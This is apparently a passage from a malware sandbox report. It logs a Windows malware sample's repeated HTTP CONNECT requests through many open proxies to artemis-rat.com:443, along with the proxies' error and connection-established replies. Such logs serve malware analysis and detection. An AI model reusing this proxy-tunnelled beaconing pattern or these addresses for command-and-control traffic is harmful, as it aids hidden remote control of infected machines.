                                              1313192.168.2.45353692.204.135.37204917284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.359844923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.356719971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.366525888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:35.366483927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:47.366238117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:11.522461891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:59.538156033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1314192.168.2.45410041.65.55.2819817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.360064983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.183496952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.366523027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.645576954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.163448095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:36.663508892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:41.198498011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:50.069431067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:07.834973097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1315192.168.2.454144172.67.209.12807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.360523939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.515079021 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1316192.168.2.45406238.54.116.981187284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.360831022 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:24.183500051 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:25.568991899 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:28.054604053 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:33.081552029 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:38.053993940 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:43.053864956 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:53.053839922 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:38:12.725820065 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1317192.168.2.454154104.25.108.120807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.360831022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.515153885 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1318192.168.2.452201112.51.96.11890917284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.363914013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.459983110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.471458912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.191642046 CET325INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.12.1
                                              Date: Mon, 11 Mar 2024 07:37:43 GMT
                                              Content-Type: text/html
                                              Content-Length: 173
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>
                                              Mar 11, 2024 08:37:33.196149111 CET325INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.12.1
                                              Date: Mon, 11 Mar 2024 07:37:43 GMT
                                              Content-Type: text/html
                                              Content-Length: 173
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1319192.168.2.454012117.160.250.131807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.363990068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.949553013 CET303INHTTP/1.1 400 Bad Request
                                              Server: openresty
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 154
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1320192.168.2.45357451.89.173.40301997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.373116970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.866565943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.570039034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.866534948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.265105963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.663378000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1321192.168.2.45316345.195.149.7910807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.373117924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1322192.168.2.454163172.93.213.177807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.375583887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.587083101 CET309INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.22.1
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 157
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1323192.168.2.452538107.180.95.177639517284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.377423048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.460247040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.471472025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:35.494815111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:47.553739071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:59.553719044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1324192.168.2.45411427.96.235.171807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.397044897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1325192.168.2.453566176.98.81.8580807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.397145033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1326192.168.2.452558192.252.208.67142877284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.399882078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1327192.168.2.45411547.243.114.19281807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.405411005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1328192.168.2.45411158.234.116.19781977284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.408301115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1329192.168.2.45411645.120.178.19710807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.413445950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1330192.168.2.45422543.153.52.1554437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.424422979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1331192.168.2.45416638.54.95.1990807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.425774097 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:25.646866083 CET39INHTTP/1.1 200 Connection established
                                              Mar 11, 2024 08:37:26.780349016 CET39INHTTP/1.1 200 Connection established
                                              Mar 11, 2024 08:37:28.092518091 CET39INHTTP/1.1 200 Connection established
                                              Mar 11, 2024 08:37:30.908284903 CET39INHTTP/1.1 200 Connection established
